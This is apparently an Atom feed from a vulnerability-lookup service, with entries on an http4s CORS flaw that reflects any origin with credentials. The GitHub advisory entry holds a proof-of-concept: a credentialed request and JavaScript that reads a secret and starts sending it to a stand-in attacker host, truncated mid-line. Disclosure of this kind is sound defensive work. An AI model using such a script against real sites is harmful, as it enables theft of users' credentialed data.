<?xml version='1.0' encoding='UTF-8'?>
<?xml-stylesheet href="/static/style.xsl" type="text/xsl"?>
<feed xmlns="http://www.w3.org/2005/Atom" xml:lang="en">
  <id>https://cve.radiocsirt.org/rss/recent/all/10</id>
  <title>Most recent entries from all</title>
  <updated>2026-10-04T15:40:06.064171+00:00</updated>
  <author>
    <name>Vulnerability-Lookup</name>
    <email>csirt@opendfir.org</email>
  </author>
  <link href="https://cve.radiocsirt.org" rel="alternate"/>
  <generator uri="https://lkiesow.github.io/python-feedgen" version="1.0.0">python-feedgen</generator>
  <subtitle>Contains only the most 10 recent entries.</subtitle>
  <entry>
    <id>https://cve.radiocsirt.org/vuln/euvd-2026-30486</id>
    <title>EUVD-2026-30486</title>
    <updated>2026-10-04T15:40:06.159123+00:00</updated>
    <content>EUVD-2026-30486</content>
    <link href="https://cve.radiocsirt.org/vuln/euvd-2026-30486"/>
  </entry>
  <entry>
    <id>https://cve.radiocsirt.org/vuln/fkie_cve-2021-39185</id>
    <title>fkie_cve-2021-39185</title>
    <updated>2026-10-04T15:40:06.159168+00:00</updated>
    <content type="xhtml">
      <div xmlns="http://www.w3.org/1999/xhtml">
        <p>Http4s is a minimal, idiomatic Scala interface for HTTP services. In http4s versions 0.21.26 and prior, 0.22.0 through 0.22.2, 0.23.0, 0.23.1, and 1.0.0-M1 through 1.0.0-M24, the default CORS configuration is vulnerable to an origin reflection attack. The middleware is also susceptible to a Null Origin Attack. The problem is fixed in 0.21.27, 0.22.3, 0.23.2, and 1.0.0-M25. The original `CORS` implementation and `CORSConfig` are deprecated. See the GitHub GHSA for more information, including code examples and workarounds.</p>
      </div>
    </content>
    <link href="https://cve.radiocsirt.org/vuln/fkie_cve-2021-39185"/>
  </entry>
  <entry>
    <id>https://cve.radiocsirt.org/vuln/ghsa-52cf-226f-rhr6</id>
    <title>GHSA-52cf-226f-rhr6 — Default CORS config allows any origin with credentials</title>
    <updated>2026-10-04T15:40:06.159254+00:00</updated>
    <content type="xhtml">
      <div xmlns="http://www.w3.org/1999/xhtml"><p><strong>Affected:</strong> Maven: org.http4s:http4s-server_2.13.0-M5, Maven: org.http4s:http4s-server_3, Maven: org.http4s:http4s-server_2.10, Maven: org.http4s:http4s-server_2.11, Maven: org.http4s:http4s-server_2.12, Maven: org.http4s:http4s-server_2.13</p>
<p>### Impact</p>
<p>#### Origin reflection attack</p>
<p>The default CORS configuration is vulnerable to an origin reflection attack.  Take the following http4s app `app`, using the default CORS config, running at https://vulnerable.example.com:</p>
<p>```scala
val routes: HttpRoutes[F] = HttpRoutes.of {
  case req if req.pathInfo === "/secret" =&gt;
    Response(Ok).withEntity(password).pure[F]
}
val app = CORS(routes.orNotFound)
```</p>
<p>The following request is made to our server:</p>
<p>```http
GET /secret HTTP/1.1
Host: vulnerable.example.com
Origin: https://adversary.example.net
Cookie: sessionId=...
```</p>
<p>When the `anyOrigin` flag of `CORSConfig` is `true`, as is the case in the default argument to `CORS`, the middleware will allow sharing its resource regardless of the `allowedOrigins` setting.  Paired with the default `allowCredentials`, the server approves sharing responses that may have required credentials for sensitive information with any origin:</p>
<p>```http
HTTP/1.1 200 OK
Access-Control-Allow-Origin: https://adversary.example.org
Access-Control-Allow-Credentials: true 
Content-Type: text/plain</p>
<p>p4ssw0rd
```</p>
<p>A malicious script running on `https://adversary.example.org/` can then exfiltrate sensitive information with the user's credentials to `vulnerable.exmaple.org`:</p>
<p>```javascript
var req = new XMLHttpRequest(); 
req.onload = reqListener; 
req.open('get','https://vulnerable.example.org/secret',true); 
req.withCredentials = true;
req.send();</p>
<p>function reqListener() {
    location='//bad-people.e…</p></div>
    </content>
    <link href="https://cve.radiocsirt.org/vuln/ghsa-52cf-226f-rhr6"/>
  </entry>
  <entry>
    <id>https://cve.radiocsirt.org/vuln/gsd-2021-39185</id>
    <title>gsd-2021-39185</title>
    <updated>2026-10-04T15:40:06.159449+00:00</updated>
    <content>gsd-2021-39185</content>
    <link href="https://cve.radiocsirt.org/vuln/gsd-2021-39185"/>
  </entry>
</feed>
